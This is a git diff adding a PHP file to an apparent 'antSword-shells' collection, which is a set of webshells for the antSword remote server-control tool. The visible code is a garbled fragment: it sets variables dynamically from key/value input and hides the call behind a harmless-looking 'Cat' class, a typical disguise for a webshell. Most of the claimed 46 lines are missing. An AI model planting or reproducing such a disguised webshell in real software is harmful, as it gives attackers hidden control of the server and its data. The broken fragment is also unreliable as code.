diff --git a/antSword-shells/php3.php b/antSword-shells/php3.php new file mode 100644 index 0000000..c0d8a4a --- /dev/null +++ b/antSword-shells/php3.php @@ -0,0 +1,46 @@ +$_value) { + $$_key= $_value; + } +} + + +$cat = new Cat(); +$cat->eat($_key, $_value);